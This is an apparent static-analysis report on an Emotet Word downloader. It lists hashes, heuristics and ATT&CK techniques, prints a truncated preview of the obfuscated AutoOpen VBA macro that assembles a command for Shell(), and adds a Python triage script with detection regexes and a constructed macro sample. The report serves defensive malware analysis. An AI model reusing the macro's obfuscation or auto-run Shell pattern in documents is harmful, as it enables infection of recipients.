Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4fdd097901d1e709…

MALICIOUS

Office (OLE)

Size: 193.6 KB
Created: 2018-09-24 16:54:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: c442627df2cf45ae0a7a43adc735c253
SHA-1: 695b452efb3bda9cfd31ed32dbcf8b4269de8807
SHA-256: 4fdd097901d1e709faaf19c845877ea8ae21b6dd4cc72ce97d869c38df0a094a
Risk score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

Two findings carry the verdict: the critical OLE_VBA_SHELL heuristic, which indicates a Shell() call inside the VBA macros, and the ClamAV signature Doc.Downloader.Emotet-6884097-0. Combined with the AutoOpen entry point (the macro runs as soon as the document is opened with macros enabled), this is consistent with an Emotet downloader: the macro's purpose is to launch a secondary payload, most likely fetched from a remote server, which is common Emotet behaviour. Two caveats for the analyst. First, the download location was not recovered statically; the only URL extracted is the benign OOXML schema namespace listed below, so the payload address lives inside the obfuscated command string and needs either deobfuscation of macros.bas or a sandbox run. Second, the medium OLE_LEGACY_WORDBASIC_AUTOEXEC finding should be read as superseded here: its description text ("no modern VBA project was recovered") does not match this sample, since a full VBA project was extracted (macros.bas under Extracted artifacts). The preview of that module shows the obfuscation style: repeated Mid/MidB/Left/Right slices of long junk string variables are concatenated into arrays that are never meaningfully used, and KeyString(vbKeyC) + KeyString(vbKeyM) assembles the real command text one letter at a time (the KeyString function returns the key name for a key code, so vbKeyC yields the letter C), which keeps readable strings out of the source.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6884097-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884097-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA source contains a Shell() call, i.e. the macro can start an external process
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro: runs automatically when the document is opened with macros enabled
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Generic description; for this sample a VBA project was recovered, see Extracted artifacts.)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body; this is the standard DrawingML schema namespace, not a download location)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  164849 bytes
            SHA-256: f2db31beb259b7f30e1f53b4dfd2b8a07542419f9c5fd9c266338c5b9c666a0a

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "sOwUDvADpkl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim QDZSli(1)
QDZSli(0) = Mid(DKqQAtcwCA + GVuPwVDPJWjnNhsrfowFSwFHvjCwuVz + IKWQioPjjKdnLj, 97, 437) + MidB(jJQcQrOHiHZjK + njjIaRzjYinbjzzalfdjtfCXFIH + pDYzYNiZjdstdP, 897, 455) + MidB(zufYQJDm + uuXQfnmQLzMCGfqlPHzUzIIUQ + wljKipFbO, 789, 547) + Mid(okmrYtaY + NRuaYIXTWdBncsbpkKndnfOVQwWLq + WtkPjTqWF, 8, 313)
   Dim UHhXn(1)
UHhXn(0) = Left(dCrRrwkC + pXzRiwIvdLwuNNdptCBGDwzNdCFIfu + wBnpIYcKZJ, 204) + Mid(DOGrbtZoQtU + fsYDTYPtObCDTarhulZowQDAEfhHSK + jlVpmtlonEoJa, 983, 947) + MidB(ipCGEanPXKNjTj + aqFLEzzzkAtcuaiwIjUfLiZOiXHTVuO + rYvjrEVD, 632, 207) + Left(FfiLzYZoLucikP + hYhjbzqZMAdQciYERYIVWpKwzwQwci + IdpVHoJwzv, 165)
   Dim KzwEpO(1)
KzwEpO(0) = MidB(aoHuJmGWASFWXG + ZDqhFhcWsRLRzVclUvFXjkzFiKRZD + imXLpsL, 705, 48) + Left(oWhwckDKuPE + wGcuLasHuojFZfrSiFvcXlijVsFp + MPjQQYb, 3)
   Dim jlWhN(2)
jlWhN(0) = Mid(skBCOYXits + outAvJKrwnSjUfhHYcMhtICL + UPBtYGInk, 508, 452) + Left(dKwiTttq + imlcNArtwfiblZLOWumUTiWzZjRkWu + GmdunthYXi, 28) + MidB(IHiXwEzv + tqDSJjuHhRTYkcHdzohflRbmN + jYpVkDkaXrcXT, 124, 868) + Left(uuoauhUdMLRB + hjrBtiDAYXCfWUNYsbrsPprUrXsSZpzv + EzLjtWRXPKA, 222)
jlWhN(1) = Right(YZqBOucMBJLc + dpYYamTQLzwUrajZFuAzvhwzsw + QqNuZmbkMS, 605) + Right(CSakmVoiDaJ + crinbuOqiFGzAtvMmPrUtOGcNqNQDRi + GZrkuoUMTnlb, 909)
   Dim tMWKYH(1)
tMWKYH(0) = Left(lBEAdEIduW + EOdsKvmcrinYAiWzlFSnDI + LIvhdDK, 450) + Right(izcVXEuWQcdZ + XYiGmbakwaUXJAjOchWVPiOsjrmcmZ + FZDlDIuD, 730)
   Dim nulWjd(1)
nulWjd(0) = MidB(VRBzVoDfSk + nvizfYBCaUBRHdJjLaGWSsozYQ + qltCsPnqK, 522, 111) + MidB(QjswLtz + DrnYLEqZmSBLjNTsUPfsCVCJwANWI + hCPTEjAkzTf, 986, 97) + MidB(iazGlvYzlCI + YQPJofzLEQpJUiYWWzGQWCbkICiRvoF + DVLZDTZJKzQQ, 834, 506) + Right(KodCdtHMuqI + tUPSzVALYCzwdLKURcPAbKEKOwiNLzJ + AzrENUmljFz, 640)
zFmdAErIntC (KeyString(vbKeyC) + KeyString(vbKeyM) + saiMuQ + hINZYk + SVvja + sKKzpL + hhcvJ + YfKPIUoIuLm + plwUucJWZXCPw)
   Dim EFcLwE(1)
EFcLwE(0) = MidB(puJIMpztbHt + IfnarDzHIzJFtDiaQoBGGZzhciaIFSzv + lEApXhvACTlHK, 22, 820) + MidB(oBFCGuWXdhqDmt + spMoLiZikdvUTZRLtTniJdRuz + PZdrRMiPiGcaSp, 324, 526) + Right(IZCOiOwF + KtnZaoBRdBNnERsUptCPlritB + uMBcFoTDA, 568) + MidB(JYHvlQZdw + VJHiBhvuAMBiLLjAkNsrsqiwsccNSrb + zKRVEinAH, 812, 337)
   Dim oLjiZ(2)
oLjiZ(0) = Right(ziEKHNnwwEKAwY + inZMaOBuanEpPVERuHJchlSAAOVv + qwrAdVjdKkTdiH, 686) + MidB(jCjONYK + HOAfEsFJwQioZGAzDCLQRJms + dajIBOUcijb, 456, 491)
oLjiZ(1) = Right(EAvdcNPzC + vzjWRzJcVqwmKlYTsjDzMIrPSSNad + TWtIOcNwmcH, 87) + Right(rpwGWIvrA + ajrKHPTcIOfKiESjREizadRU + hcWWvosW, 743) + MidB(ncAbdKlcR + ajRJrmQjqMRaOsIPqtmHRchVzSfsqVS + FmwFFFoSbLZMl, 36, 433) + Mid(uVnYzjK + OKCVvHNBDtGpowpqIMQJGkbz + FFmonrdPF, 297, 337)
   Dim kYsjKt(1)
kYsjKt(0) = Left(PnXlCSYwirO + jpSroINflAMNSDUjjhMpikBQPCYzCEiAiZr + GwimKXkZUdzK, 628) + MidB(BSYHmsw + BKJjsUuszGrDkQrvYZoWl + PBkksIURlAOAjz, 675, 136) + Right(LMzinuVACEmM + FtFsIaEwWmkzPKvpSoSBhOpOrFQfZ + vnuqwafMpLjCw, 116) + Left(PUXBwmrX + LMtGGZYGUBwTOHNzMsIBzAKBLuJw + jOSTjEKi, 820)
   Dim FQAJt(1)
FQAJt(0) = Right(AaSZDLvG + NLKaimnAptlnhCWisjRLAvwtGKGXdIm + btbdNJEpPOm, 698) + Left(dDXlfvzJiith + WQdBRWuoQFzjVljKJiUGWGVjROtkf + TwllTBmomR, 781) + Mid(dYzYkwMFBKGu + daXURPsCnvYphphohJnCtAjGQRniqXK + OzXhpbkCz, 887, 337) + Right(TWYlInjIC + IbkzQhSWjbTqczbIPPkAwRFF + ZFLdnYNqll, 335)
   Dim krGYi(1)
krGYi(0) = Right(wwZjbQATK + LQUHaWJimbsPRjtOIWwzLjjCz + oDAVpYCdRkOz, 987) + MidB(GJSulVawws + IXtTMEFXXubIbCbittodXkCpLOHEccF + YQCvujw, 278, 287) + Left(JTwRCVNZTuWi + tJQmRwDhzNqbEMItQfsPpBH + aKBhtjAXibz, 850) + Left(VvEMuINdfOp + AtblKjXHmBfzEoHnLBhDlpNFSwfnsA + iHqmIMUjuYPwEY, 428)
   Dim qoAfOI(1)
qoAfOI(0) = MidB(btjNUYbm + cCzGVHNXjlXdEtLzmrzFKwL + SAmDDapZv, 688, 368) + Right(qEabEPcjA + pvTfzpIKcFDzhTDPFsEUBsijt + jRVVOHG, 186) + Mid(bIQTlBc + LNiaUXkbSnTGOaSnhbzFdTijoB + BpJjoBr
... (truncated)
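The three macro heuristics above (OLE_VBA_MACROS, OLE_VBA_AUTOOPEN, OLE_VBA_SHELL) and the slicing-plus-KeyString pattern visible in the preview are straightforward to reproduce on the extracted macros.bas. The Python below is an added example written for this page; it is not the report's own scanner and not oletools code. The macro text embedded in it is constructed to mirror the preview's shape (the Shell() call and the zFmdAErIntC body are assumptions, since the preview is truncated before any Shell call appears), and the command-line file path is likewise an assumption.

```python
"""Static triage of an olevba-extracted VBA module (added example).

Re-implements, in simplified form, the checks behind OLE_VBA_MACROS,
OLE_VBA_AUTOOPEN and OLE_VBA_SHELL, and adds two observations this sample
invites: how much of the code is Mid/MidB/Left/Right string slicing, and what
KeyString(vbKeyX) lookups spell when read statically.
Usage (path is an assumption): python triage.py macros.bas
"""
import re
import sys
from collections import Counter

# Constructed sample mirroring the shape of the preview above: junk string
# slicing, KeyString character building, an AutoOpen entry point. The Shell
# sink is an assumption added so the execution-sink check has something to find.
SAMPLE_VBA = r'''
Attribute VB_Name = "sOwUDvADpkl"
Sub AutoOpen()
   Dim QDZSli(1)
QDZSli(0) = Mid(DKqQAtcwCA + GVuPwVDPJ, 97, 437) + MidB(jJQcQrOHiH + njjIaR, 897, 455) + Left(okmrYtaY + NRua, 8)
zFmdAErIntC (KeyString(vbKeyC) + KeyString(vbKeyM) + KeyString(vbKeyD) + saiMuQ + hINZYk)
End Sub
Sub zFmdAErIntC(cmdline)
    Shell cmdline, vbHide
End Sub
'''

# Procedure declarations (OLE_VBA_MACROS-style "macro code present" check).
PROC_DECL = re.compile(r'^\s*(?:(?:Private|Public)\s+)?(?:Sub|Function)\s', re.I | re.M)
# Auto-execution entry points Word/Excel run without further user interaction.
AUTOEXEC = re.compile(
    r'\bSub\s+(AutoOpen|AutoExec|AutoNew|Document_Open|Workbook_Open|Auto_Open)\b', re.I)
# Calls through which a macro can start a process or reach COM automation.
EXEC_SINK = re.compile(r'\b(Shell|ShellExecute|CreateObject|GetObject|WScript\.Shell)\b', re.I)
# Substring primitives used to carve text out of long junk strings.
SLICE_FN = re.compile(r'\b(Mid|MidB|Left|LeftB|Right|RightB)\s*\(', re.I)
# KeyString(vbKeyC) evaluates to the key name for key code vbKeyC, i.e. "C".
KEYSTRING = re.compile(r'KeyString\s*\(\s*vbKey([A-Z0-9])\s*\)', re.I)
KEYSTRING_RUN = re.compile(r'(?:' + KEYSTRING.pattern + r'\s*(?:\+\s*)?)+', re.I)


def resolve_keystring_runs(src: str) -> list[str]:
    """Join consecutive KeyString(vbKeyX) + KeyString(vbKeyY) terms into the text
    they build. Letters follow the key name (upper case); Windows resolves
    command names case-insensitively, so CMD and cmd are the same program."""
    return [''.join(KEYSTRING.findall(m.group(0))).upper()
            for m in KEYSTRING_RUN.finditer(src)]


def triage(src: str) -> dict:
    """Run the heuristics over one VBA module and return the raw observations."""
    code_lines = [l for l in src.splitlines() if l.strip() and not l.lstrip().startswith("'")]
    slices = Counter(m.group(1) for m in SLICE_FN.finditer(src))
    return {
        'macros_present': bool(PROC_DECL.search(src)),
        'autoexec': sorted({m.group(1) for m in AUTOEXEC.finditer(src)}),
        'exec_sinks': sorted({m.group(1) for m in EXEC_SINK.finditer(src)}),
        'slice_calls': dict(slices),
        # Slice calls per code line: ordinary business macros sit near zero,
        # the preview above runs several per assignment statement.
        'slice_density': round(sum(slices.values()) / max(len(code_lines), 1), 2),
        'keystring_text': resolve_keystring_runs(src),
    }


def verdict(f: dict) -> str:
    """Map observations to the severity ladder the report uses."""
    if f['autoexec'] and f['exec_sinks']:
        return 'critical'   # runs on open and can start a process
    if f['autoexec'] or f['exec_sinks']:
        return 'high'
    if f['macros_present']:
        return 'medium'
    return 'clean'


if __name__ == '__main__':
    src = open(sys.argv[1], errors='replace').read() if len(sys.argv) > 1 else SAMPLE_VBA
    result = triage(src)
    for key, value in result.items():
        print(f'{key:15} {value}')
    print(f'{"verdict":15} {verdict(result)}')
```

Token matching of this kind only sees literal names: a Shell reached through a string built from Chr() or slices and invoked via CallByName, or through a late-bound COM object, is invisible to it, and a harmless variable that happens to be named Shell is a false positive. That is why the ClamAV family signature and a sandbox run, not the regex hits, remain the authoritative evidence for the downloader claim; the static triage is for fast sorting and for pointing the analyst at the obfuscation to unwind.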